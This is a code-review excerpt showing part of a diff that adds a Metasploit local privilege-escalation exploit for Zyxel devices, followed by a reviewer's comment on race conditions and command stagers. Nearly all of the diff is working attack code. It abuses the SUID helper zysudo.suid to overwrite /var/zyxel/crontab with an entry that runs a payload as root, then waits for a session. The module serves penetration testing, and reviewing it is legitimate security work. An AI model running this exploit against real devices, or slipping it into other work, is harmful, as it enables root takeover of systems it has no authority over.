modules/exploits/linux/local/zyxel_suid_cp_lpe.rb

```diff
@@ -0,0 +1,164 @@
+
+    firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]
+    return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?
+
+    test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"
+    unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"
+      return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")
+    unless suid_copy_result.empty?
+      return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    # clean up the created file
+    cmd_exec("zysudo.suid /bin/rm #{test_file}")
+
+    return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")
+  end
+
+  # no matter what happens, try to reset the crontab to the original state and
+  # delete the backup file.
+  def cleanup
+    unless @crontab_backup.nil?
+      print_status('Resetting crontab to the original version')
+      cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
+      rm_rf(@crontab_backup)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # this file will contain the payload and get executed by cron
+    exec_filename = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    register_file_for_cleanup(exec_filename)
+    cmd_exec("echo -e \"#!/bin/bash\\n\\n#{cmd}\" > #{exec_filename}")
+    cmd_exec("chmod +x #{exec_filename}")
+
+    # this file will be a copy of the original crontab, plus our additional malicious entry
+    evil_crontab = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    register_file_for_cleanup(evil_crontab)
+    copy_file('/var/zyxel/crontab', evil_crontab)
+    cmd_exec("echo '* * * * * root #{exec_filename} &' >> #{evil_crontab}")
+
+    # this is the backup copy of the original crontab. It'll be restored on new session
+    @crontab_backup = "/tmp/#{rand_text_alphanumeric(6..12)}"
+    copy_file('/var/zyxel/crontab', @crontab_backup)
+
+    # overwrite the legitimate crontab. this is how we get exectuion.
+    print_status('Overwriting /var/zyxel/crontab')
+    cmd_exec("zysudo.suid /bin/cp #{evil_crontab} /var/zyxel/crontab")
+
+    # check if the session has been created. Give it 70 seconds to come in.
+    # The extra 10 seconds is to account for high latency links.
+    print_status('The payload may take up to 60 seconds to be executed by cron')
+    sleep_count = 70
+    until session_created? || sleep_count == 0
+      sleep(1)
+      sleep_count -= 1
+    end
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end
```

Comment:
This approach seems to make some dangerous assumptions. Are the `cron` commands always going to be executed in order? And not racey? Using a command stager such as `echo` or `printf` may be problematic. Also, you're sleeping in `execute_command` which may be called multiple times, and you're expecting a session with `session_created?`, which may not occur after the first command.

You could opt out of these command stagers, but I'm not convinced that a command stager is required at all.

This is a local exploit. We have local shell access. Why note write the payload file to disk with `write_file` ?